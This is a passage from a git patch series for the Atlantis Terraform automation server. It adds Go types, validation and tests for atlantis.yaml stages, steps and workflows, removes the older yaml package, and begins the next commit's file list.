valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/stage.go b/server/events/yaml/raw/stage.go new file mode 100644 index 0000000000..67eef1d3be --- /dev/null +++ b/server/events/yaml/raw/stage.go @@ -0,0 +1,26 @@ +package raw + +import ( + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Stage struct { + Steps []Step `yaml:"steps,omitempty"` +} + +func (s Stage) Validate() error { + return validation.ValidateStruct(&s, + validation.Field(&s.Steps), + ) +} + +func (s Stage) ToValid() valid.Stage { + var validSteps []valid.Step + for _, s := range s.Steps { + validSteps = append(validSteps, s.ToValid()) + } + return valid.Stage{ + Steps: validSteps, + } +} diff --git a/server/events/yaml/raw/stage_test.go b/server/events/yaml/raw/stage_test.go new file mode 100644 index 0000000000..245ed2c4f3 --- /dev/null +++ b/server/events/yaml/raw/stage_test.go @@ -0,0 +1,103 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestStage_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Stage + }{ + { + description: "empty", + input: "", + exp: raw.Stage{ + Steps: nil, + }, + }, + { + description: "all fields set", + input: ` +steps: [step1] +`, + exp: raw.Stage{ + Steps: []raw.Step{ + { + Key: String("step1"), + }, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a raw.Stage + err := yaml.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} + +func TestStage_Validate(t *testing.T) { + // Should validate each step. + s := raw.Stage{ + Steps: []raw.Step{ + { + Key: String("invalid"), + }, + }, + } + validation.ErrorTag = "yaml" + ErrEquals(t, "steps: (0: \"invalid\" is not a valid step type.).", s.Validate()) + + // Empty steps should validate. + Ok(t, (raw.Stage{}).Validate()) +} + +func TestStage_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Stage + exp valid.Stage + }{ + { + description: "nothing set", + input: raw.Stage{}, + exp: valid.Stage{ + Steps: nil, + }, + }, + { + description: "fields set", + input: raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + exp: valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go new file mode 100644 index 0000000000..b414f4607f --- /dev/null +++ b/server/events/yaml/raw/step.go @@ -0,0 +1,195 @@ +package raw + +import ( + "errors" + "fmt" + "strings" + + "github.com/flynn-archive/go-shlex" + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +const ( + ExtraArgsKey = "extra_args" + RunStepName = "run" + PlanStepName = "plan" + ApplyStepName = "apply" + InitStepName = "init" +) + +// Step represents a single action/command to perform. In YAML, it can be set as +// 1. A single string for a built-in command: +// - init +// - plan +// 2. A map for a built-in command and extra_args: +// - plan: +// extra_args: [-var-file=staging.tfvars] +// 3. A map for a custom run command: +// - run: my custom command +// Here we parse step in the most generic fashion possible. See fields for more +// details. +type Step struct { + // Key will be set in case #1 and #3 above to the key. In case #2, there + // could be multiple keys (since the element is a map) so we don't set Key. + Key *string + // Map will be set in case #2 above. + Map map[string]map[string][]string + // StringVal will be set in case #3 above. + StringVal map[string]string +} + +func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + // We validate if it's a legal string later. + var singleString string + err := unmarshal(&singleString) + if err == nil { + s.Key = &singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + // We validate if there's a single key in the map and if the value is a + // legal value later. + var step map[string]map[string][]string + err = unmarshal(&step) + if err == nil { + s.Map = step + return nil + } + + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + // We validate if the key is run later. + var runStep map[string]string + err = unmarshal(&runStep) + if err == nil { + s.StringVal = runStep + return nil + } + + return err +} + +func (s Step) Validate() error { + validStep := func(value interface{}) error { + str := *value.(*string) + if str != InitStepName && str != PlanStepName && str != ApplyStepName { + return fmt.Errorf("%q is not a valid step type", str) + } + return nil + } + + extraArgs := func(value interface{}) error { + elem := value.(map[string]map[string][]string) + var keys []string + for k := range elem { + keys = append(keys, k) + } + + if len(keys) > 1 { + return fmt.Errorf("step element can only contain a single key, found %d: %s", + len(keys), strings.Join(keys, ",")) + } + for stepName, args := range elem { + if stepName != InitStepName && stepName != PlanStepName && stepName != ApplyStepName { + return fmt.Errorf("%q is not a valid step type", stepName) + } + var argKeys []string + for k := range args { + argKeys = append(argKeys, k) + } + + // args should contain a single 'extra_args' key. + if len(argKeys) > 1 { + return fmt.Errorf("built-in steps only support a single %s key, found %d: %s", + ExtraArgsKey, len(argKeys), strings.Join(argKeys, ",")) + } + for k := range args { + if k != ExtraArgsKey { + return fmt.Errorf("built-in steps only support a single %s key, found %q in step %s", ExtraArgsKey, k, stepName) + } + } + } + return nil + } + + runStep := func(value interface{}) error { + elem := value.(map[string]string) + var keys []string + for k := range elem { + keys = append(keys, k) + } + + if len(keys) > 1 { + return fmt.Errorf("step element can only contain a single key, found %d: %s", + len(keys), strings.Join(keys, ",")) + } + for stepName, args := range elem { + if stepName != RunStepName { + return fmt.Errorf("%q is not a valid step type", stepName) + } + _, err := shlex.Split(args) + if err != nil { + return fmt.Errorf("unable to parse as shell command: %s", err) + } + } + return nil + } + + if s.Key != nil { + return validation.Validate(s.Key, validation.By(validStep)) + } + if len(s.Map) > 0 { + return validation.Validate(s.Map, validation.By(extraArgs)) + } + if len(s.StringVal) > 0 { + return validation.Validate(s.StringVal, validation.By(runStep)) + } + return errors.New("step element is empty") +} + +func (s Step) ToValid() valid.Step { + // This will trigger in case #1 (see Step docs). + if s.Key != nil { + return valid.Step{ + StepName: *s.Key, + } + } + + // This will trigger in case #2 (see Step docs). + if len(s.Map) > 0 { + // After validation we assume there's only one key and it's a valid + // step name so we just use the first one. + for stepName, stepArgs := range s.Map { + return valid.Step{ + StepName: stepName, + ExtraArgs: stepArgs[ExtraArgsKey], + } + } + } + + // This will trigger in case #3 (see Step docs). + if len(s.StringVal) > 0 { + // After validation we assume there's only one key and it's a valid + // step name so we just use the first one. + for _, v := range s.StringVal { + // We ignore the error here because it should have been checked in + // Validate(). + split, _ := shlex.Split(v) // nolint: errcheck + return valid.Step{ + StepName: RunStepName, + RunCommand: split, + } + } + } + + panic("step was not valid. This is a bug!") +} diff --git a/server/events/yaml/raw/step_test.go b/server/events/yaml/raw/step_test.go new file mode 100644 index 0000000000..ec8a5d4934 --- /dev/null +++ b/server/events/yaml/raw/step_test.go @@ -0,0 +1,387 @@ +package raw_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Step + expErr string + }{ + + // Single string. + { + description: "single string", + input: `astring`, + exp: raw.Step{ + Key: String("astring"), + }, + }, + + // MapType i.e. extra_args style. + { + description: "extra_args style", + input: ` +key: + mapValue: [arg1, arg2]`, + exp: raw.Step{ + Map: MapType{ + "key": { + "mapValue": {"arg1", "arg2"}, + }, + }, + }, + }, + { + description: "extra_args style multiple keys", + input: ` +key: + mapValue: [arg1, arg2] + value2: []`, + exp: raw.Step{ + Map: MapType{ + "key": { + "mapValue": {"arg1", "arg2"}, + "value2": {}, + }, + }, + }, + }, + { + description: "extra_args style multiple top-level keys", + input: ` +key: + val1: [] +key2: + val2: []`, + exp: raw.Step{ + Map: MapType{ + "key": { + "val1": {}, + }, + "key2": { + "val2": {}, + }, + }, + }, + }, + + // Run-step style + { + description: "run step", + input: ` +run: my command`, + exp: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + }, + { + description: "run step multiple top-level keys", + input: ` +run: my command +key: value`, + exp: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + "key": "value", + }, + }, + }, + + // Empty + { + description: "empty", + input: "", + exp: raw.Step{ + Key: nil, + Map: nil, + StringVal: nil, + }, + }, + + // Errors + { + description: "extra args style no slice strings", + input: ` +key: + value: + another: map`, + expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got raw.Step + err := yaml.UnmarshalStrict([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} + +func TestStep_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Step + expErr string + }{ + // Valid inputs. + { + description: "init step", + input: raw.Step{ + Key: String("init"), + }, + expErr: "", + }, + { + description: "plan step", + input: raw.Step{ + Key: String("plan"), + }, + expErr: "", + }, + { + description: "apply step", + input: raw.Step{ + Key: String("apply"), + }, + expErr: "", + }, + { + description: "init extra_args", + input: raw.Step{ + Map: MapType{ + "init": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "plan extra_args", + input: raw.Step{ + Map: MapType{ + "plan": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "apply extra_args", + input: raw.Step{ + Map: MapType{ + "apply": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "run step", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + expErr: "", + }, + + // Invalid inputs. + { + description: "empty elem", + input: raw.Step{}, + expErr: "step element is empty", + }, + { + description: "invalid step name", + input: raw.Step{ + Key: String("invalid"), + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "multiple keys in map", + input: raw.Step{ + Map: MapType{ + "key1": nil, + "key2": nil, + }, + }, + expErr: "step element can only contain a single key, found 2: key1,key2", + }, + { + description: "multiple keys in string val", + input: raw.Step{ + StringVal: map[string]string{ + "key1": "", + "key2": "", + }, + }, + expErr: "step element can only contain a single key, found 2: key1,key2", + }, + { + description: "invalid key in map", + input: raw.Step{ + Map: MapType{ + "invalid": nil, + }, + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "invalid key in string val", + input: raw.Step{ + StringVal: map[string]string{ + "invalid": "", + }, + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "non extra_arg key", + input: raw.Step{ + Map: MapType{ + "init": { + "invalid": nil, + }, + }, + }, + expErr: "built-in steps only support a single extra_args key, found \"invalid\" in step init", + }, + { + description: "unparseable shell command", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my 'c", + }, + }, + expErr: "unable to parse as shell command: EOF found when expecting closing quote.", + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + return + } + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestStep_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Step + exp valid.Step + }{ + { + description: "init step", + input: raw.Step{ + Key: String("init"), + }, + exp: valid.Step{ + StepName: "init", + }, + }, + { + description: "plan step", + input: raw.Step{ + Key: String("plan"), + }, + exp: valid.Step{ + StepName: "plan", + }, + }, + { + description: "apply step", + input: raw.Step{ + Key: String("apply"), + }, + exp: valid.Step{ + StepName: "apply", + }, + }, + { + description: "init extra_args", + input: raw.Step{ + Map: MapType{ + "init": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "init", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "plan extra_args", + input: raw.Step{ + Map: MapType{ + "plan": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "apply extra_args", + input: raw.Step{ + Map: MapType{ + "apply": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "apply", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "run step", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my 'run command'", + }, + }, + exp: valid.Step{ + StepName: "run", + RunCommand: []string{"my", "run command"}, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} + +type MapType map[string]map[string][]string diff --git a/server/events/yaml/raw/workflow.go b/server/events/yaml/raw/workflow.go new file mode 100644 index 0000000000..1a6dc73245 --- /dev/null +++ b/server/events/yaml/raw/workflow.go @@ -0,0 +1,31 @@ +package raw + +import ( + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Workflow struct { + Apply *Stage `yaml:"apply,omitempty"` + Plan *Stage `yaml:"plan,omitempty"` +} + +func (w Workflow) Validate() error { + return validation.ValidateStruct(&w, + validation.Field(&w.Apply), + validation.Field(&w.Plan), + ) +} + +func (w Workflow) ToValid() valid.Workflow { + var v valid.Workflow + if w.Apply != nil { + apply := w.Apply.ToValid() + v.Apply = &apply + } + if w.Plan != nil { + plan := w.Plan.ToValid() + v.Plan = &plan + } + return v +} diff --git a/server/events/yaml/raw/workflow_test.go b/server/events/yaml/raw/workflow_test.go new file mode 100644 index 0000000000..85320cfaad --- /dev/null +++ b/server/events/yaml/raw/workflow_test.go @@ -0,0 +1,168 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestWorkflow_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Workflow + expErr string + }{ + { + description: "empty", + input: ``, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "yaml null", + input: `~`, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "only plan/apply set", + input: ` +plan: +apply: +`, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "steps set to null", + input: ` +plan: + steps: ~ +apply: + steps: ~`, + exp: raw.Workflow{ + Plan: &raw.Stage{ + Steps: nil, + }, + Apply: &raw.Stage{ + Steps: nil, + }, + }, + }, + { + description: "steps set to empty slice", + input: ` +plan: + steps: [] +apply: + steps: []`, + exp: raw.Workflow{ + Plan: &raw.Stage{ + Steps: []raw.Step{}, + }, + Apply: &raw.Stage{ + Steps: []raw.Step{}, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var w raw.Workflow + err := yaml.UnmarshalStrict([]byte(c.input), &w) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, w) + }) + } +} + +func TestWorkflow_Validate(t *testing.T) { + // Should call the validate of Stage. + w := raw.Workflow{ + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("invalid"), + }, + }, + }, + } + validation.ErrorTag = "yaml" + ErrEquals(t, "apply: (steps: (0: \"invalid\" is not a valid step type.).).", w.Validate()) + + // Unset keys should validate. + Ok(t, (raw.Workflow{}).Validate()) +} + +func TestWorkflow_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Workflow + exp valid.Workflow + }{ + { + description: "nothing set", + input: raw.Workflow{}, + exp: valid.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "fields set", + input: raw.Workflow{ + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + }, + exp: valid.Workflow{ + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go deleted file mode 100644 index 874877f766..0000000000 --- a/server/events/yaml/spec.go +++ /dev/null @@ -1,7 +0,0 @@ -package yaml - -type Spec struct { - Version *int `yaml:"version,omitempty"` - Projects []Project `yaml:"projects,omitempty"` - Workflows map[string]Workflow `yaml:"workflows,omitempty"` -} diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go deleted file mode 100644 index 6106e22a27..0000000000 --- a/server/events/yaml/spec_test.go +++ /dev/null @@ -1,152 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Spec - expErr string - }{ - { - description: "no data", - input: "", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "yaml nil", - input: "~", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "invalid key", - input: "invalid: key", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct yaml.Spec", - }, - { - description: "version set", - input: "version: 2", - exp: yaml.Spec{ - Version: Int(2), - Projects: nil, - Workflows: nil, - }, - }, - { - description: "projects key without value", - input: "projects:", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "workflows key without value", - input: "workflows:", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "projects with a map", - input: "projects:\n key: value", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []yaml.Project", - }, - { - description: "projects with a scalar", - input: "projects: value", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []yaml.Project", - }, - { - description: "should use values if set", - input: ` -version: 2 -projects: -- dir: mydir - workspace: myworkspace - workflow: default - terraform_version: v0.11.0 - auto_plan: - enabled: false - when_modified: [] - apply_requirements: [mergeable] -workflows: - default: - plan: - steps: [] - apply: - steps: []`, - exp: yaml.Spec{ - Version: Int(2), - Projects: []yaml.Project{ - { - Dir: String("mydir"), - Workspace: String("myworkspace"), - Workflow: String("default"), - TerraformVersion: String("v0.11.0"), - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{}, - Enabled: Bool(false), - }, - ApplyRequirements: []string{"mergeable"}, - }, - }, - Workflows: map[string]yaml.Workflow{ - "default": { - Apply: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - }, - }, - }, - }, - } - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var conf yaml.Spec - err := yamlv2.UnmarshalStrict([]byte(c.input), &conf) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, conf) - }) - } -} diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go deleted file mode 100644 index be342403f6..0000000000 --- a/server/events/yaml/stage.go +++ /dev/null @@ -1,5 +0,0 @@ -package yaml - -type Stage struct { - Steps []Step `yaml:"steps,omitempty"` -} diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go deleted file mode 100644 index ffcebe1a5a..0000000000 --- a/server/events/yaml/stage_test.go +++ /dev/null @@ -1,47 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStage_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Stage - }{ - { - description: "empty", - input: "", - exp: yaml.Stage{ - Steps: nil, - }, - }, - { - description: "all fields set", - input: ` -steps: [step1] -`, - exp: yaml.Stage{ - Steps: []yaml.Step{ - { - Key: String("step1"), - }, - }, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var a yaml.Stage - err := yamlv2.UnmarshalStrict([]byte(c.input), &a) - Ok(t, err) - Equals(t, c.exp, a) - }) - } -} diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go deleted file mode 100644 index f8c09d9bc0..0000000000 --- a/server/events/yaml/step.go +++ /dev/null @@ -1,61 +0,0 @@ -package yaml - -// Step represents a single action/command to perform. In YAML, it can be set as -// 1. A single string for a built-in command: -// - init -// - plan -// 2. A map for a built-in command and extra_args: -// - plan: -// extra_args: [-var-file=staging.tfvars] -// 3. A map for a custom run command: -// - run: my custom command -// Here we parse step in the most generic fashion possible. See fields for more -// details. -type Step struct { - // Key will be set in case #1 and #3 above to the key. In case #2, there - // could be multiple keys (since the element is a map) so we don't set Key. - Key *string - // Map will be set in case #2 above. - Map map[string]map[string][]string - // StringVal will be set in case #3 above. - StringVal map[string]string -} - -func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. - // steps: - // - init - // - plan - // We validate if it's a legal string later. - var singleString string - err := unmarshal(&singleString) - if err == nil { - s.Key = &singleString - return nil - } - - // This represents a step with extra_args, ex: - // init: - // extra_args: [a, b] - // We validate if there's a single key in the map and if the value is a - // legal value later. - var step map[string]map[string][]string - err = unmarshal(&step) - if err == nil { - s.Map = step - return nil - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - // We validate if the key is run later. - var runStep map[string]string - err = unmarshal(&runStep) - if err == nil { - s.StringVal = runStep - return nil - } - - return err -} diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go deleted file mode 100644 index 4bdb6f33ec..0000000000 --- a/server/events/yaml/step_test.go +++ /dev/null @@ -1,134 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStepConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Step - expErr string - }{ - - // Single string. - { - description: "single string", - input: `astring`, - exp: yaml.Step{ - Key: String("astring"), - }, - }, - - // map[string]map[string][]string i.e. extra_args style. - { - description: "extra_args style", - input: ` -key: - mapValue: [arg1, arg2]`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "mapValue": {"arg1", "arg2"}, - }, - }, - }, - }, - { - description: "extra_args style multiple keys", - input: ` -key: - mapValue: [arg1, arg2] - value2: []`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "mapValue": {"arg1", "arg2"}, - "value2": {}, - }, - }, - }, - }, - { - description: "extra_args style multiple top-level keys", - input: ` -key: - val1: [] -key2: - val2: []`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "val1": {}, - }, - "key2": { - "val2": {}, - }, - }, - }, - }, - - // Run-step style - { - description: "run step", - input: ` -run: my command`, - exp: yaml.Step{ - StringVal: map[string]string{ - "run": "my command", - }, - }, - }, - { - description: "run step multiple top-level keys", - input: ` -run: my command -key: value`, - exp: yaml.Step{ - StringVal: map[string]string{ - "run": "my command", - "key": "value", - }, - }, - }, - - // Empty - { - description: "empty", - input: "", - exp: yaml.Step{ - Key: nil, - Map: nil, - StringVal: nil, - }, - }, - - // Errors - { - description: "extra args style no slice strings", - input: ` -key: - value: - another: map`, - expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var got yaml.Step - err := yamlv2.UnmarshalStrict([]byte(c.input), &got) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, got) - }) - } -} diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go new file mode 100644 index 0000000000..75d79a3d93 --- /dev/null +++ b/server/events/yaml/valid/valid.go @@ -0,0 +1,41 @@ +package valid + +// Spec is the atlantis yaml spec after it's been parsed and validated. +// The raw.Spec is transformed into the ValidSpec which is then used by the +// rest of Atlantis. +type Spec struct { + // Version is the version of the atlantis YAML file. Will always be equal + // to 2. + Version int + Projects []Project + Workflows map[string]Workflow +} + +type Project struct { + Dir string + Workspace string + Workflow *string + TerraformVersion *string + Autoplan Autoplan + ApplyRequirements []string +} + +type Autoplan struct { + WhenModified []string + Enabled bool +} + +type Stage struct { + Steps []Step +} + +type Step struct { + StepName string + ExtraArgs []string + RunCommand []string +} + +type Workflow struct { + Apply *Stage + Plan *Stage +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go deleted file mode 100644 index 0dd069c648..0000000000 --- a/server/events/yaml/workflow.go +++ /dev/null @@ -1,6 +0,0 @@ -package yaml - -type Workflow struct { - Apply *Stage `yaml:"apply,omitempty"` - Plan *Stage `yaml:"plan,omitempty"` -} diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go deleted file mode 100644 index c2dcbb34f8..0000000000 --- a/server/events/yaml/workflow_test.go +++ /dev/null @@ -1,91 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestWorkflow_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Workflow - expErr string - }{ - { - description: "empty", - input: ``, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "yaml null", - input: `~`, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "only plan/apply set", - input: ` -plan: -apply: -`, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "steps set to null", - input: ` -plan: - steps: ~ -apply: - steps: ~`, - exp: yaml.Workflow{ - Plan: &yaml.Stage{ - Steps: nil, - }, - Apply: &yaml.Stage{ - Steps: nil, - }, - }, - }, - { - description: "steps set to empty slice", - input: ` -plan: - steps: [] -apply: - steps: []`, - exp: yaml.Workflow{ - Plan: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - Apply: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var w yaml.Workflow - err := yamlv2.UnmarshalStrict([]byte(c.input), &w) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, w) - }) - } -} diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go deleted file mode 100644 index 08b884cae0..0000000000 --- a/server/events/yaml/yaml.go +++ /dev/null @@ -1,4 +0,0 @@ -// Package yaml contains the golang representations of the YAML elements -// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML -// in order to set defaults. -package yaml From b5e2a730de932a6da07cdfd09c72900f96927fa3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 14:01:09 +0100 Subject: [PATCH 21/69] WIP Add operators and get compiled. --- server/events/apply_executor.go | 92 -------- server/events/command_handler.go | 13 +- server/events/event_parser.go | 2 +- server/events/execution_planner.go | 215 ------------------ server/events/models/models.go | 24 ++ server/events/plan_executor.go | 109 --------- server/events/project_locker.go | 19 +- server/events/project_operator.go | 190 ++++++++++++++++ ...cutor_test.go => project_operator_test.go} | 2 +- server/events/pull_request_operator.go | 193 ++++++++++++++++ ..._test.go => pull_request_operator_test.go} | 4 +- server/events/runtime/apply_step.go | 24 -- server/events/runtime/apply_step_operator.go | 30 +++ ...ep_test.go => apply_step_operator_test.go} | 0 server/events/runtime/approval_operator.go | 18 ++ server/events/runtime/init_step.go | 20 -- server/events/runtime/init_step_operator.go | 29 +++ ...tep_test.go => init_step_operator_test.go} | 22 +- .../{plan_step.go => plan_step_operater.go} | 52 +++-- ...tep_test.go => plan_step_operater_test.go} | 0 server/events/runtime/repoconfig.go | 93 -------- server/events/runtime/run_step.go | 35 --- server/events/runtime/run_step_operator.go | 33 +++ ...step_test.go => run_step_operator_test.go} | 0 server/events/runtime/runtime.go | 18 ++ server/events/terraform/terraform_client.go | 13 +- server/events/yaml/raw/project.go | 13 +- server/events/yaml/valid/valid.go | 31 ++- server/server.go | 68 +++--- 29 files changed, 673 insertions(+), 689 deletions(-) delete mode 100644 server/events/apply_executor.go delete mode 100644 server/events/execution_planner.go delete mode 100644 server/events/plan_executor.go create mode 100644 server/events/project_operator.go rename server/events/{plan_executor_test.go => project_operator_test.go} (99%) create mode 100644 server/events/pull_request_operator.go rename server/events/{execution_planner_test.go => pull_request_operator_test.go} (98%) delete mode 100644 server/events/runtime/apply_step.go create mode 100644 server/events/runtime/apply_step_operator.go rename server/events/runtime/{apply_step_test.go => apply_step_operator_test.go} (100%) create mode 100644 server/events/runtime/approval_operator.go delete mode 100644 server/events/runtime/init_step.go create mode 100644 server/events/runtime/init_step_operator.go rename server/events/runtime/{init_step_test.go => init_step_operator_test.go} (75%) rename 